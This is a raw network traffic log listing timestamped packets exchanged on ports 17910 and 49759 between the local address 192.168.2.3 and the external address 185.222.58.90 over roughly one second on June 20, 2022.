Jun 20, 2022 05:29:08.813364029 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.813869953 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.814416885 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.814893007 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.814922094 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.815013885 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.815062046 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.815502882 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.815665960 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.815759897 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.829195976 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.829226971 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.829320908 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.829770088 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.829866886 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.831541061 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.832139015 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.836292028 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.836563110 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.837631941 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.837661028 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.837723970 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.837897062 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.838673115 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.838705063 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.838736057 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.838774920 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.838783979 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.838802099 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.838831902 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.838890076 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.838897943 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.838994026 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.839152098 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.839457035 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.845578909 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.845611095 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.852330923 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.852492094 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.852611065 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.854512930 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.857110977 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.858998060 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.859169006 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.861377001 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.861665010 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.861795902 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.861825943 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.862082005 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.862123013 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.875117064 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.875267982 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.879482985 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.881622076 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.884212971 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.884432077 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.884670973 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.884701014 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.884726048 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.884757996 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.884844065 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.885961056 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.885987997 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.886096001 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.907773018 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.908622026 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.908773899 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.908821106 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.909060001 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.909668922 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.909804106 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.910367012 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.910399914 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.910685062 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.931581020 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.931613922 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.931740999 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.931813955 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.932107925 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.932208061 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.932411909 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.932627916 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.932725906 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.933017969 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.933156013 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.954405069 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.954524040 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.954607010 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.954720020 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.954787016 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.954952002 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.955251932 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.955355883 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.955390930 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.955519915 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:08.955672026 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.977199078 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.977344036 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.977618933 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.977818966 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:08.978101015 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.059812069 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.059855938 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.059881926 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.060074091 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:09.060336113 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.060364962 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.060393095 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.082981110 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.083234072 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.083355904 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:09.083455086 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.084219933 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.084331989 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:09.085252047 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.085820913 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:09.105860949 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.105971098 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:09.106031895 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.106137991 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:09.106235027 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.106323957 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:09.107556105 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.107780933 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.107889891 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:09.107973099 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.108004093 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.108041048 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.108057022 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:09.108089924 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:09.108110905 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:09.108287096 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.110884905 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:09.128632069 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.128671885 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.128810883 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:09.128977060 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.129141092 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:09.130531073 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.130790949 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.130997896 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.133168936 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.133424997 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.138396978 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.138427973 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.138454914 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.138484001 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.138554096 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.138593912 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.138596058 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:09.145149946 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.151237011 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.151443005 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.151601076 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.151628971 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.151849031 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.161549091 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.161897898 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.188296080 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.188334942 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.297271967 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.300890923 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:09.377295017 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.383013964 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.383907080 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:09.406624079 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.406727076 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:09.406917095 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.407042027 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:09.407057047 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.407195091 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:09.407304049 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.407404900 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:09.407565117 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.408304930 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:09.429402113 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.429439068 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.429538965 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:09.429631948 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.429666996 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.429698944 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:09.429707050 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.429738045 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:09.429748058 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.429785013 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:09.429785967 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.429819107 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.430169106 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.430289984 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.430494070 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.430558920 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.430851936 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.452863932 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.452949047 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.453145981 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:09.476594925 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.476705074 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.476735115 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.476769924 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.476798058 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:09.476810932 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.476850033 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.476854086 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:09.476871967 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:09.476887941 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.476941109 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.476972103 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.476999998 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.477026939 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.477080107 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:09.477127075 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:09.477233887 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.477262020 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.481544971 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.481570959 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.481599092 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.481626987 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.481651068 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.481739044 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.499609947 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.499716043 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.499861956 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.500103951 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.500242949 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:09.522787094 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.522891998 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:09.522948980 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.523041010 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:09.523458958 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.523493052 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.523555994 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:09.523588896 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:09.545734882 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.545906067 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.546009064 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:09.546155930 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.546242952 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:09.546432018 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.549369097 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:09.549809933 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.564373970 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.564410925 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.569039106 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.570410967 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:09.571904898 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.571939945 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.572038889 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:09.572118998 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.572194099 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:09.593311071 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.593355894 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.593466997 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:09.593525887 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:09.593854904 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.595427036 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.595540047 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:09.600516081 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.600548983 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.616019964 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.616069078 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.616230011 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:09.617063999 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.617183924 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:09.617892981 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.618102074 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.618218899 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:09.640125036 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.640239954 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:09.640598059 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.640835047 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.640880108 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:09.640957117 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:09.641024113 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.641096115 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:09.662992001 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.663024902 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.663158894 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:09.663405895 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.663537979 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:09.663544893 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.663662910 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:09.663788080 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.663898945 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:09.686163902 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.686290026 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.686319113 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.686345100 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.686372042 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.686434031 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:09.686485052 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:09.686500072 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:09.686614990 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.686811924 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.708909988 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.709028006 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.709146023 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:09.709280968 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.730417013 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.730432034 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.730443954 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.730456114 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.731654882 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.732031107 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:09.735008955 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.735287905 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.735318899 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.735428095 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.768763065 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.768798113 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.768910885 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:09.768970966 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:09.791860104 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.792011976 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:09.792015076 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.792471886 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:09.814765930 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.814856052 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.814990997 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:09.815093040 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.817377090 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:09.838135958 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.838264942 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:09.838435888 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.838515997 CEST	17910	49759	185.222.58.90	192.168.2.3
Jun 20, 2022 05:29:09.838548899 CEST	49759	17910	192.168.2.3	185.222.58.90
Jun 20, 2022 05:29:09.838604927 CEST	49759	17910	192.168.2.3	185.222.58.90
